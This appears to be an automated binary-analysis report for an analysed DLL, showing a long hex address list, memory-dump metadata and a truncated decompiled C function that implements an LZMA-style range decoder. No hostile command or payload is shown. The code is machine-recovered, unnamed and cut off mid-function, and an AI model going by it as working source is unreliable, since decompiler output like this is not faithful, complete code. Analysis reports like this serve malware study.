                                                                                                                                                      0x1000697f
                                                                                                                                                      0x10006985
                                                                                                                                                      0x1000698a
                                                                                                                                                      0x100069cf
                                                                                                                                                      0x100069cf
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000698c
                                                                                                                                                      0x1000698c
                                                                                                                                                      0x1000698f
                                                                                                                                                      0x10006991
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10006993
                                                                                                                                                      0x10006993
                                                                                                                                                      0x100069a1
                                                                                                                                                      0x100069a8
                                                                                                                                                      0x100069ab
                                                                                                                                                      0x100069ad
                                                                                                                                                      0x100069d3
                                                                                                                                                      0x100069d3
                                                                                                                                                      0x100069d8
                                                                                                                                                      0x100069e7
                                                                                                                                                      0x100069e7
                                                                                                                                                      0x100069f0
                                                                                                                                                      0x100069fa
                                                                                                                                                      0x100069fa
                                                                                                                                                      0x100069fa
                                                                                                                                                      0x100069fe
                                                                                                                                                      0x100069da
                                                                                                                                                      0x100069da
                                                                                                                                                      0x100069de
                                                                                                                                                      0x100069e0
                                                                                                                                                      0x100069e2
                                                                                                                                                      0x100069e5
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x100069e5
                                                                                                                                                      0x100069e0
                                                                                                                                                      0x10006a05
                                                                                                                                                      0x100069af
                                                                                                                                                      0x100069b8
                                                                                                                                                      0x100069bf
                                                                                                                                                      0x100069c6
                                                                                                                                                      0x100069c6
                                                                                                                                                      0x100069ad
                                                                                                                                                      0x10006991
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000698a
                                                                                                                                                      0x100068fc
                                                                                                                                                      0x10006906
                                                                                                                                                      0x1000690b
                                                                                                                                                      0x1000690e
                                                                                                                                                      0x10006910
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10006916
                                                                                                                                                      0x10006916
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10006916
                                                                                                                                                      0x10006910
                                                                                                                                                      0x1000685c
                                                                                                                                                      0x1000685f
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000685f
                                                                                                                                                      0x10006856
                                                                                                                                                      0x10006812
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10006a7d
                                                                                                                                                      0x10006a81
                                                                                                                                                      0x10006a85
                                                                                                                                                      0x10006a88
                                                                                                                                                      0x10006a8c
                                                                                                                                                      0x10006a8c
                                                                                                                                                      0x10006a96
                                                                                                                                                      0x10006a9b
                                                                                                                                                      0x10006aa8
                                                                                                                                                      0x10006aa8
                                                                                                                                                      0x10006aab
                                                                                                                                                      0x10006ab6
                                                                                                                                                      0x10006ab6
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10006a9b
                                                                                                                                                      0x10006791
                                                                                                                                                      0x10006744
                                                                                                                                                      0x1000671c
                                                                                                                                                      0x1000670d
                                                                                                                                                      0x100066d3
                                                                                                                                                      0x100066c8
                                                                                                                                                      0x10006635
                                                                                                                                                      0x10006324
                                                                                                                                                      0x100062c4
                                                                                                                                                      0x100062c4
                                                                                                                                                      0x100062c4
                                                                                                                                                      0x100062cd
                                                                                                                                                      0x100062cd
                                                                                                                                                      0x1000624a
                                                                                                                                                      0x1000624a
                                                                                                                                                      0x1000624f
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10006251
                                                                                                                                                      0x10006269
                                                                                                                                                      0x10006280
                                                                                                                                                      0x10006285
                                                                                                                                                      0x10006288
                                                                                                                                                      0x1000628a
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10006290
                                                                                                                                                      0x10006293
                                                                                                                                                      0x1000629f
                                                                                                                                                      0x100062a6
                                                                                                                                                      0x100062ab
                                                                                                                                                      0x100062ad
                                                                                                                                                      0x00000000
                                                                                                                                                      0x100062b3
                                                                                                                                                      0x100062b3
                                                                                                                                                      0x00000000
                                                                                                                                                      0x100062b3
                                                                                                                                                      0x100062ad
                                                                                                                                                      0x1000628a
                                                                                                                                                      0x1000624f
                                                                                                                                                      0x100061b3
                                                                                                                                                      0x100061b3
                                                                                                                                                      0x100061b8
                                                                                                                                                      0x00000000
                                                                                                                                                      0x100061be
                                                                                                                                                      0x100061c5
                                                                                                                                                      0x100061ca
                                                                                                                                                      0x100061eb
                                                                                                                                                      0x100061f7
                                                                                                                                                      0x100061fc
                                                                                                                                                      0x10006203
                                                                                                                                                      0x10006207
                                                                                                                                                      0x1000620e
                                                                                                                                                      0x10006211
                                                                                                                                                      0x10006213
                                                                                                                                                      0x10006218
                                                                                                                                                      0x1000621d
                                                                                                                                                      0x10006234
                                                                                                                                                      0x10006239
                                                                                                                                                      0x1000623b
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10006241
                                                                                                                                                      0x10006241
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10006241
                                                                                                                                                      0x1000621f
                                                                                                                                                      0x1000622d
                                                                                                                                                      0x1000622d
                                                                                                                                                      0x1000621d
                                                                                                                                                      0x100061b8
                                                                                                                                                      0x1000614d
                                                                                                                                                      0x10006151
                                                                                                                                                      0x10006158
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10006160
                                                                                                                                                      0x10006160
                                                                                                                                                      0x1000616c
                                                                                                                                                      0x10006173
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10006179
                                                                                                                                                      0x1000617f
                                                                                                                                                      0x10006186
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10006192
                                                                                                                                                      0x10006192
                                                                                                                                                      0x10006192
                                                                                                                                                      0x10006186
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10006173
                                                                                                                                                      0x10006199
                                                                                                                                                      0x1000619e
                                                                                                                                                      0x100061a0
                                                                                                                                                      0x00000000
                                                                                                                                                      0x100061a6
                                                                                                                                                      0x100061a6
                                                                                                                                                      0x00000000
                                                                                                                                                      0x100061a6
                                                                                                                                                      0x100061a0
                                                                                                                                                      0x10006158
                                                                                                                                                      0x10006144
                                                                                                                                                      0x00000000

                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: baacfdb0298eb98a6c54e2f5c55f6a732fa9040cff60af18b8a8e558c0dc3850
                                                                                                                                                      • Instruction ID: 61d3ccd6a23604d47a57db8de3889c3396fcc74338933db4fa832e0d0e218fb6
                                                                                                                                                      • Opcode Fuzzy Hash: baacfdb0298eb98a6c54e2f5c55f6a732fa9040cff60af18b8a8e558c0dc3850
                                                                                                                                                      • Instruction Fuzzy Hash: 34627DB56083818FE710CF24C880A5AB7E2EFC9394F25492DF88497359D731ED45CB92
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 10009257, Relevance: .5, Instructions: 518COMMONCrypto
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 98%
                                                                                                                                                      			E10009257(unsigned int __eax, void* __ecx, signed int __edx, signed int __esi) {
				unsigned int _t495;
				unsigned int _t496;
				unsigned int _t497;
				unsigned int _t498;
				unsigned int _t499;
				unsigned int _t500;
				unsigned int _t501;
				unsigned int _t502;
				unsigned int _t508;
				unsigned int _t509;
				unsigned int _t510;
				unsigned int _t511;
				unsigned int _t512;
				unsigned int _t515;
				unsigned int _t516;
				unsigned int _t517;
				unsigned int _t518;
				unsigned int _t519;
				unsigned int _t520;
				unsigned int _t521;
				unsigned int _t522;
				unsigned int _t523;
				unsigned int _t524;
				unsigned int _t525;
				unsigned int _t526;
				unsigned int _t527;
				unsigned int _t528;
				unsigned int _t529;
				unsigned int _t530;
				unsigned int _t531;
				unsigned int _t532;
				unsigned int _t533;
				unsigned int _t534;
				unsigned int _t535;
				unsigned int _t536;
				unsigned int _t537;
				unsigned int _t538;
				unsigned int _t539;
				signed int _t542;
				signed int _t543;
				void* _t544;
				void* _t546;
				void* _t555;
				void* _t556;
				void* _t557;
				void* _t558;
				void* _t559;
				unsigned int _t562;
				unsigned int _t568;
				unsigned int _t571;
				unsigned int _t573;
				unsigned int _t575;
				unsigned int _t584;
				void* _t604;
				unsigned int _t607;
				void* _t622;
				unsigned int _t625;
				unsigned int _t648;
				signed int _t650;
				signed int _t651;
				unsigned int _t656;
				signed int _t660;
				unsigned int _t665;
				signed int _t669;
				unsigned int _t674;
				signed int _t678;
				unsigned int _t683;
				signed int _t687;
				unsigned int _t692;
				signed int _t727;
				void* _t728;
				void* _t729;
				void* _t730;
				void* _t731;
				void* _t732;
				void* _t733;
				unsigned int _t737;
				unsigned int _t740;
				signed int _t744;
				unsigned int _t747;
				unsigned int _t749;
				signed int _t751;
				signed int _t753;
				signed int _t756;
				signed int _t761;
				void* _t764;
				unsigned int _t765;
				signed int _t767;
				void* _t769;
				intOrPtr _t772;
				signed int _t776;
				void* _t777;
				signed int _t781;
				signed int _t784;
				signed char _t787;
				void* _t788;
				unsigned int _t789;
				signed int _t791;
				signed int _t792;
				signed int _t793;
				unsigned int _t796;
				signed int _t799;
				unsigned int _t800;
				signed char* _t807;
				signed char* _t809;
				unsigned int _t813;
				signed int _t816;
				unsigned int _t817;
				void* _t819;
				signed char* _t826;
				signed char* _t828;
				unsigned int _t832;
				signed int _t839;
				signed int _t847;
				signed int _t848;
				signed int _t853;
				signed int _t859;
				signed int _t860;
				signed int _t861;
				signed int _t862;
				signed int _t863;
				signed int _t864;
				signed int _t865;
				unsigned int _t866;
				unsigned int _t871;
				signed int _t873;
				unsigned int _t874;
				unsigned int _t876;
				unsigned int _t878;
				unsigned int _t880;
				unsigned int _t882;
				unsigned int _t884;
				unsigned int _t886;
				signed int _t890;
				signed int _t891;
				signed int _t892;
				signed int _t893;
				signed int _t894;
				unsigned int _t903;
				signed int _t947;
				unsigned int _t949;
				unsigned int _t951;
				signed int _t955;
				signed int _t960;
				signed char* _t962;
				unsigned int _t968;
				unsigned int _t973;
				unsigned int _t978;
				unsigned int _t983;
				unsigned int _t988;
				unsigned int _t991;
				signed int _t997;
				signed int _t1000;
				unsigned int _t1002;
				signed char* _t1029;
				unsigned int _t1036;
				unsigned int _t1040;
				unsigned int _t1043;
				unsigned int _t1052;
				unsigned int _t1056;
				unsigned int _t1059;
				unsigned int _t1074;
				signed int _t1077;
				signed short* _t1080;
				unsigned int _t1081;
				signed int _t1084;
				signed short* _t1085;
				unsigned int _t1086;
				signed int _t1089;
				signed short* _t1090;
				unsigned int _t1091;
				signed int _t1094;
				signed short* _t1095;
				unsigned int _t1096;
				signed int _t1099;
				signed short* _t1100;
				unsigned int _t1101;
				signed int _t1104;
				signed short* _t1105;
				unsigned int _t1106;
				signed int _t1112;
				unsigned int _t1115;
				signed char* _t1124;
				unsigned int _t1141;
				unsigned int _t1146;
				unsigned int _t1151;
				unsigned int _t1156;
				unsigned int _t1161;
				unsigned int _t1166;
				unsigned int _t1171;
				unsigned int _t1176;
				signed char* _t1185;
				signed int _t1223;
				unsigned int _t1228;
				unsigned int _t1231;
				unsigned int _t1235;
				unsigned int _t1240;
				signed int _t1246;
				void* _t1250;
				signed int _t1251;
				void* _t1253;
				unsigned int _t1254;
				signed int _t1256;
				unsigned int _t1257;
				unsigned int _t1259;
				unsigned int _t1261;
				unsigned int _t1263;
				void* _t1265;
				signed int _t1268;
				signed int _t1269;
				signed int _t1271;
				signed char* _t1276;
				signed char* _t1282;
				unsigned int _t1285;
				signed int _t1287;
				signed char* _t1293;
				void* _t1299;
				short* _t1300;
				signed int _t1301;
				signed int _t1303;
				signed int _t1305;
				signed int _t1307;
				signed char* _t1309;
				signed int _t1311;
				intOrPtr _t1313;
				char* _t1315;
				signed char* _t1316;
				signed char* _t1318;
				unsigned int _t1321;
				unsigned int _t1326;
				unsigned int _t1331;
				void* _t1351;
				intOrPtr _t1353;
				signed int _t1358;
				signed int _t1359;
				unsigned int _t1362;
				void* _t1366;
				void* _t1367;
				void* _t1368;
				void* _t1369;
				void* _t1370;
				void* _t1371;
				signed char* _t1378;
				char _t1379;
				void* _t1381;

				_t1223 = __esi;
				_t890 = __edx;
				_t495 = __eax;
				while(1) {
					L153:
					_t544 = _t764 + _t764;
					_t765 =  *(_t544 + _t1246 + 0x200) & 0x0000ffff;
					if(_t502 < 0x1000000) {
						_t502 = _t502 << 8;
						_t890 = _t890 << 0x00000008 |  *( *(_t1381 + 0x10)) & 0x000000ff;
						 *(_t1381 + 0x10) =  &(( *(_t1381 + 0x10))[1]);
					}
					_t955 = (_t502 >> 0xb) * _t765;
					if(_t890 >= _t955) {
						_t502 = _t502 - _t955;
						_t890 = _t890 - _t955;
						 *(_t544 + _t1246 + 0x200) = _t765 - (_t765 >> 5);
						_t764 = _t544 + 1;
					} else {
						_t502 = _t955;
						 *(_t544 + _t1246 + 0x200) = (0x800 - _t765 >> 5) + _t765;
						_t764 = _t544;
					}
					if(_t764 < 0x100) {
						continue;
					}
					L159:
					_t767 = _t764 - 0xf0;
					while(1) {
						 *(_t1381 + 0x30) = _t767;
						if( *(_t1381 + 0x14) < 0xc) {
							goto L231;
						}
						L161:
						if(_t767 >= 4) {
							_t767 = 3;
						}
						_t776 = _t767 + 1 << 7;
						_t1254 =  *(_t776 + _t1311 + 2) & 0x0000ffff;
						_t777 = _t776 + _t1311;
						if(_t502 < 0x1000000) {
							_t1029 =  *(_t1381 + 0x10);
							_t502 = _t502 << 8;
							_t890 = _t890 << 0x00000008 |  *_t1029 & 0x000000ff;
							 *(_t1381 + 0x10) =  &(_t1029[1]);
						}
						_t968 = (_t502 >> 0xb) * _t1254;
						if(_t890 >= _t968) {
							_t508 = _t502 - _t968;
							_t890 = _t890 - _t968;
							 *((short*)(_t777 + 2)) = _t1254 - (_t1254 >> 5);
							_t1256 = 3;
						} else {
							_t508 = _t968;
							 *((short*)(_t777 + 2)) = (0x800 - _t1254 >> 5) + _t1254;
							_t1256 = 2;
						}
						_t1316 =  *(_t1381 + 0x10);
						_t556 = _t1256 + _t1256;
						_t1257 =  *(_t556 + _t777) & 0x0000ffff;
						if(_t508 < 0x1000000) {
							_t508 = _t508 << 8;
							_t890 = _t890 << 0x00000008 |  *_t1316 & 0x000000ff;
							_t1316 =  &(_t1316[1]);
							 *(_t1381 + 0x10) = _t1316;
						}
						_t973 = (_t508 >> 0xb) * _t1257;
						if(_t890 >= _t973) {
							_t509 = _t508 - _t973;
							_t890 = _t890 - _t973;
							 *(_t556 + _t777) = _t1257 - (_t1257 >> 5);
							_t556 = _t556 + 1;
						} else {
							_t509 = _t973;
							 *(_t556 + _t777) = (0x800 - _t1257 >> 5) + _t1257;
						}
						_t557 = _t556 + _t556;
						_t1259 =  *(_t557 + _t777) & 0x0000ffff;
						if(_t509 < 0x1000000) {
							_t509 = _t509 << 8;
							_t890 = _t890 << 0x00000008 |  *_t1316 & 0x000000ff;
							_t1316 =  &(_t1316[1]);
							 *(_t1381 + 0x10) = _t1316;
						}
						_t978 = (_t509 >> 0xb) * _t1259;
						if(_t890 >= _t978) {
							_t510 = _t509 - _t978;
							_t890 = _t890 - _t978;
							 *(_t557 + _t777) = _t1259 - (_t1259 >> 5);
							_t557 = _t557 + 1;
						} else {
							_t510 = _t978;
							 *(_t557 + _t777) = (0x800 - _t1259 >> 5) + _t1259;
						}
						_t558 = _t557 + _t557;
						_t1261 =  *(_t558 + _t777) & 0x0000ffff;
						if(_t510 < 0x1000000) {
							_t510 = _t510 << 8;
							_t890 = _t890 << 0x00000008 |  *_t1316 & 0x000000ff;
							_t1316 =  &(_t1316[1]);
							 *(_t1381 + 0x10) = _t1316;
						}
						_t983 = (_t510 >> 0xb) * _t1261;
						if(_t890 >= _t983) {
							_t511 = _t510 - _t983;
							_t890 = _t890 - _t983;
							 *(_t558 + _t777) = _t1261 - (_t1261 >> 5);
							_t558 = _t558 + 1;
						} else {
							_t511 = _t983;
							 *(_t558 + _t777) = (0x800 - _t1261 >> 5) + _t1261;
						}
						_t559 = _t558 + _t558;
						_t1263 =  *(_t559 + _t777) & 0x0000ffff;
						if(_t511 < 0x1000000) {
							_t511 = _t511 << 8;
							_t890 = _t890 << 0x00000008 |  *_t1316 & 0x000000ff;
							_t1316 =  &(_t1316[1]);
							 *(_t1381 + 0x10) = _t1316;
						}
						_t988 = (_t511 >> 0xb) * _t1263;
						if(_t890 >= _t988) {
							_t512 = _t511 - _t988;
							_t890 = _t890 - _t988;
							 *(_t559 + _t777) = _t1263 - (_t1263 >> 5);
							_t559 = _t559 + 1;
						} else {
							_t512 = _t988;
							 *(_t559 + _t777) = (0x800 - _t1263 >> 5) + _t1263;
						}
						_t1265 = _t559 + _t559;
						_t991 =  *(_t1265 + _t777) & 0x0000ffff;
						if(_t512 < 0x1000000) {
							_t512 = _t512 << 8;
							_t890 = _t890 << 0x00000008 |  *_t1316 & 0x000000ff;
							 *(_t1381 + 0x10) =  &(_t1316[1]);
						}
						_t562 = (_t512 >> 0xb) * _t991;
						if(_t890 >= _t562) {
							_t502 = _t512 - _t562;
							_t890 = _t890 - _t562;
							 *(_t1265 + _t777) = _t991 - (_t991 >> 5);
							_t1265 = _t1265 + 1;
						} else {
							_t502 = _t562;
							 *(_t1265 + _t777) = (0x800 - _t991 >> 5) + _t991;
						}
						_t1246 = _t1265 - 0x40;
						if(_t1246 < 4) {
							L228:
							 *(_t1381 + 0x48) =  *(_t1381 + 0x40);
							 *(_t1381 + 0x40) =  *(_t1381 + 0x3c);
							 *(_t1381 + 0x3c) =  *(_t1381 + 0x2c);
							_t436 = _t1246 + 1; // -61
							_t781 = _t436;
							 *(_t1381 + 0x2c) = _t781;
							asm("sbb ecx, ecx");
							 *(_t1381 + 0x14) = (_t781 & 0xfffffffd) + 0xa;
							_t784 =  *(_t1381 + 0x4c);
							if(_t784 == 0) {
								_t784 =  *(_t1381 + 0x28);
							}
							if(_t1246 >= _t784) {
								 *( *((intOrPtr*)(_t1381 + 0x60)) + 0x18) =  *(_t1381 + 0x1c);
								return 1;
							} else {
								goto L231;
							}
						} else {
							_t787 = (_t1246 >> 1) - 1;
							_t1268 = _t1246 & 0x00000001 | 0x00000002;
							if(_t1246 >= 0xe) {
								_t1318 =  *(_t1381 + 0x10);
								_t788 = _t787 - 4;
								do {
									if(_t502 < 0x1000000) {
										_t502 = _t502 << 8;
										_t890 = _t890 << 0x00000008 |  *_t1318 & 0x000000ff;
										_t1318 =  &(_t1318[1]);
									}
									_t502 = _t502 >> 1;
									_t903 = _t890 - _t502;
									_t997 =  ~(_t903 >> 0x1f);
									_t1268 = _t997 + 1 + _t1268 * 2;
									_t890 = _t903 + (_t997 & _t502);
									_t788 = _t788 - 1;
								} while (_t788 != 0);
								_t1000 =  *(_t1381 + 0x44);
								_t789 =  *(_t1000 + 2) & 0x0000ffff;
								_t1269 = _t1268 << 4;
								 *(_t1381 + 0x10) = _t1318;
								if(_t502 < 0x1000000) {
									_t502 = _t502 << 8;
									_t890 = _t890 << 0x00000008 |  *_t1318 & 0x000000ff;
									_t1318 =  &(_t1318[1]);
									 *(_t1381 + 0x10) = _t1318;
								}
								_t568 = (_t502 >> 0xb) * _t789;
								if(_t890 >= _t568) {
									_t515 = _t502 - _t568;
									_t890 = _t890 - _t568;
									 *(_t1000 + 2) = _t789 - (_t789 >> 5);
									_t791 = 3;
								} else {
									_t515 = _t568;
									 *(_t1000 + 2) = (0x800 - _t789 >> 5) + _t789;
									_t791 = 2;
								}
								_t571 =  *(_t1000 + _t791 * 2) & 0x0000ffff;
								if(_t515 < 0x1000000) {
									_t515 = _t515 << 8;
									_t890 = _t890 << 0x00000008 |  *_t1318 & 0x000000ff;
									 *(_t1381 + 0x10) =  &(( *(_t1381 + 0x10))[1]);
								}
								_t1321 = (_t515 >> 0xb) * _t571;
								if(_t890 >= _t1321) {
									_t516 = _t515 - _t1321;
									_t890 = _t890 - _t1321;
									 *(_t1000 + _t791 * 2) = _t571 - (_t571 >> 5);
									_t792 = _t791 + 4;
								} else {
									_t516 = _t1321;
									 *(_t1000 + _t791 * 2) = (0x800 - _t571 >> 5) + _t571;
									_t792 = _t791 + 2;
								}
								_t573 =  *(_t1000 + _t792 * 2) & 0x0000ffff;
								if(_t516 < 0x1000000) {
									_t516 = _t516 << 8;
									_t890 = _t890 << 0x00000008 |  *( *(_t1381 + 0x10)) & 0x000000ff;
									 *(_t1381 + 0x10) =  &(( *(_t1381 + 0x10))[1]);
								}
								_t1326 = (_t516 >> 0xb) * _t573;
								if(_t890 >= _t1326) {
									_t517 = _t516 - _t1326;
									_t890 = _t890 - _t1326;
									 *(_t1000 + _t792 * 2) = _t573 - (_t573 >> 5);
									_t793 = _t792 + 8;
								} else {
									_t517 = _t1326;
									 *(_t1000 + _t792 * 2) = (0x800 - _t573 >> 5) + _t573;
									_t793 = _t792 + 4;
								}
								_t575 =  *(_t1000 + _t793 * 2) & 0x0000ffff;
								if(_t517 < 0x1000000) {
									_t517 = _t517 << 8;
									_t890 = _t890 << 0x00000008 |  *( *(_t1381 + 0x10)) & 0x000000ff;
									 *(_t1381 + 0x10) =  &(( *(_t1381 + 0x10))[1]);
								}
								_t1331 = (_t517 >> 0xb) * _t575;
								if(_t890 >= _t1331) {
									_t502 = _t517 - _t1331;
									_t890 = _t890 - _t1331;
									 *(_t1000 + _t793 * 2) = _t575 - (_t575 >> 5);
								} else {
									_t502 = _t1331;
									 *(_t1000 + _t793 * 2) = (0x800 - _t575 >> 5) + _t575;
									_t793 = _t793 - 8;
								}
								_t1246 = _t1269 | _t793;
								if(_t1246 == 0xffffffff) {
									 *(_t1381 + 0x14) =  *(_t1381 + 0x14) - 0xc;
									_t1251 = 0x112;
									L250:
									_t772 =  *((intOrPtr*)(_t1381 + 0x60));
									_t962 =  *(_t1381 + 0x10);
									if(_t502 < 0x1000000) {
										_t502 = _t502 << 8;
										_t890 = _t890 << 0x00000008 |  *_t962 & 0x000000ff;
										_t962 =  &(_t962[1]);
									}
									 *(_t772 + 0x24) = _t890;
									 *(_t772 + 0x20) = _t502;
									 *(_t772 + 0x18) =  *(_t1381 + 0x1c);
									 *(_t772 + 0x28) =  *(_t1381 + 0x28);
									 *(_t772 + 0x1c) = _t962;
									 *(_t772 + 0x30) =  *(_t1381 + 0x2c);
									 *(_t772 + 0x44) = _t1251;
									 *(_t772 + 0x34) =  *(_t1381 + 0x3c);
									 *(_t772 + 0x38) =  *(_t1381 + 0x3c);
									 *(_t772 + 0x3c) =  *(_t1381 + 0x44);
									 *((intOrPtr*)(_t772 + 0x40)) =  *((intOrPtr*)(_t1381 + 0xc));
									return 0;
								} else {
									goto L228;
								}
							} else {
								_t1351 = 1;
								_t1271 = (_t1268 << _t787) + 1;
								do {
									_t1002 =  *( *(_t1381 + 0x44) + _t1271 * 2 - 0xd00) & 0x0000ffff;
									if(_t502 < 0x1000000) {
										_t502 = _t502 << 8;
										_t890 = _t890 << 0x00000008 |  *( *(_t1381 + 0x10)) & 0x000000ff;
										 *(_t1381 + 0x10) =  &(( *(_t1381 + 0x10))[1]);
									}
									_t584 = (_t502 >> 0xb) * _t1002;
									if(_t890 >= _t584) {
										_t502 = _t502 - _t584;
										_t890 = _t890 - _t584;
										_t1351 = _t1351 + _t1351;
										 *( *(_t1381 + 0x44) + _t1271 * 2 - 0xd00) = _t1002 - (_t1002 >> 5);
										_t1271 = _t1271 + _t1351;
									} else {
										_t502 = _t584;
										 *( *(_t1381 + 0x44) + _t1271 * 2 - 0xd00) = (0x800 - _t1002 >> 5) + _t1002;
										_t1271 = _t1271 + _t1351;
										_t1351 = _t1351 + _t1351;
									}
									_t787 = _t787 - 1;
								} while (_t787 != 0);
								_t1246 = _t1271 - _t1351;
								goto L228;
							}
						}
						L253:
						L231:
						_t960 =  *(_t1381 + 0x1c);
						_t546 =  *(_t1381 + 0x30) + 2;
						_t769 =  *((intOrPtr*)(_t1381 + 0x64)) - _t960;
						if(_t769 == 0) {
							 *( *((intOrPtr*)(_t1381 + 0x60)) + 0x18) = _t960;
							return 1;
						} else {
							if(_t769 >= _t546) {
								_t769 = _t546;
							}
							asm("sbb esi, esi");
							 *(_t1381 + 0x28) =  *(_t1381 + 0x28) + _t769;
							 *(_t1381 + 0x30) = _t546 - _t769;
							_t1250 = (_t1246 &  *(_t1381 + 0x38)) -  *(_t1381 + 0x2c) + _t960;
							if(_t769 >  *(_t1381 + 0x38) - _t1250) {
								_t1313 =  *((intOrPtr*)(_t1381 + 0x34));
								do {
									 *((char*)(_t960 + _t1313)) =  *((intOrPtr*)(_t1250 + _t1313));
									_t1250 = _t1250 + 1;
									_t960 = _t960 + 1;
									if(_t1250 ==  *(_t1381 + 0x38)) {
										_t1250 = 0;
									}
									_t769 = _t769 - 1;
								} while (_t769 != 0);
								 *(_t1381 + 0x1c) = _t960;
							} else {
								_t1315 = _t960 +  *((intOrPtr*)(_t1381 + 0x34));
								_t1253 = _t1250 - _t960;
								_t555 = _t769 + _t1315;
								 *(_t1381 + 0x1c) = _t960 + _t769;
								do {
									 *_t1315 =  *((intOrPtr*)(_t1253 + _t1315));
									_t1315 = _t1315 + 1;
								} while (_t1315 != _t555);
								L243:
								while( *(_t1381 + 0x1c) <  *((intOrPtr*)(_t1381 + 0x64)) &&  *(_t1381 + 0x10) <  *((intOrPtr*)(_t1381 + 0x68))) {
									_t1223 =  *(_t1381 + 0x58);
									_t1311 =  *(_t1381 + 0x44);
									_t542 = ( *(_t1381 + 0x28) & _t1223) << 4;
									 *(_t1381 + 0x24) = _t542;
									_t543 = _t542 +  *(_t1381 + 0x14);
									_t737 =  *(_t1311 + _t543 * 2 - 0x200) & 0x0000ffff;
									if(_t495 < 0x1000000) {
										_t1309 =  *(_t1381 + 0x10);
										_t495 = _t495 << 8;
										_t890 = _t890 << 0x00000008 |  *_t1309 & 0x000000ff;
										 *(_t1381 + 0x10) =  &(_t1309[1]);
									}
									_t947 = (_t495 >> 0xb) * _t737;
									if(_t890 >= _t947) {
										 *(_t1311 + _t543 * 2 - 0x200) = _t737 - (_t737 >> 5);
										_t740 =  *(_t1311 + 0x20 +  *(_t1381 + 0x14) * 2) & 0x0000ffff;
										_t496 = _t495 - _t947;
										_t891 = _t890 - _t947;
										if(_t496 < 0x1000000) {
											_t1293 =  *(_t1381 + 0x10);
											_t496 = _t496 << 8;
											_t891 = _t891 << 0x00000008 |  *_t1293 & 0x000000ff;
											 *(_t1381 + 0x10) =  &(_t1293[1]);
										}
										_t1228 = (_t496 >> 0xb) * _t740;
										if(_t891 >= _t1228) {
											_t948 =  *(_t1381 + 0x14);
											_t497 = _t496 - _t1228;
											_t890 = _t891 - _t1228;
											 *((short*)(_t1311 + 0x20 + _t948 * 2)) = _t740 - (_t740 >> 5);
											_t1231 =  *(_t1311 + 0x38 + _t948 * 2) & 0x0000ffff;
											if(_t497 < 0x1000000) {
												_t497 = _t497 << 8;
												_t890 = _t890 << 0x00000008 |  *( *(_t1381 + 0x10)) & 0x000000ff;
												 *(_t1381 + 0x10) =  &(( *(_t1381 + 0x10))[1]);
											}
											_t744 = (_t497 >> 0xb) * _t1231;
											if(_t890 >= _t744) {
												_t498 = _t497 - _t744;
												_t892 = _t890 - _t744;
												 *(_t1311 + 0x38 + _t948 * 2) = _t1231 - (_t1231 >> 5);
												_t747 =  *(_t1311 + 0x50 + _t948 * 2) & 0x0000ffff;
												if(_t498 < 0x1000000) {
													_t1282 =  *(_t1381 + 0x10);
													_t498 = _t498 << 8;
													_t892 = _t892 << 0x00000008 |  *_t1282 & 0x000000ff;
													 *(_t1381 + 0x10) =  &(_t1282[1]);
												}
												_t1235 = (_t498 >> 0xb) * _t747;
												if(_t892 >= _t1235) {
													_t499 = _t498 - _t1235;
													_t893 = _t892 - _t1235;
													 *(_t1311 + 0x50 + _t948 * 2) = _t747 - (_t747 >> 5);
													_t749 =  *(_t1311 + 0x68 + _t948 * 2) & 0x0000ffff;
													if(_t499 < 0x1000000) {
														_t1276 =  *(_t1381 + 0x10);
														_t499 = _t499 << 8;
														_t893 = _t893 << 0x00000008 |  *_t1276 & 0x000000ff;
														 *(_t1381 + 0x10) =  &(_t1276[1]);
													}
													_t1240 = (_t499 >> 0xb) * _t749;
													if(_t893 >= _t1240) {
														_t500 = _t499 - _t1240;
														_t893 = _t893 - _t1240;
														 *(_t1311 + 0x68 + _t948 * 2) = _t749 - (_t749 >> 5);
														_t751 =  *(_t1381 + 0x48);
														 *(_t1381 + 0x48) =  *(_t1381 + 0x40);
													} else {
														_t500 = _t1240;
														_t751 =  *(_t1381 + 0x40);
														 *(_t1311 + 0x68 + _t948 * 2) = (0x800 - _t749 >> 5) + _t749;
													}
													 *(_t1381 + 0x40) =  *(_t1381 + 0x3c);
												} else {
													_t500 = _t1235;
													_t751 =  *(_t1381 + 0x3c);
													 *(_t1311 + 0x50 + _t948 * 2) = (0x800 - _t747 >> 5) + _t747;
												}
												 *(_t1381 + 0x3c) =  *(_t1381 + 0x2c);
												 *(_t1381 + 0x2c) = _t751;
												goto L115;
											} else {
												_t948 =  *(_t1381 + 0x14);
												 *((short*)(_t1311 + 0x38 +  *(_t1381 + 0x14) * 2)) = (0x800 - _t1231 >> 5) + _t1231;
												_t1285 =  *(_t1311 + _t543 * 2 - 0xc00) & 0x0000ffff;
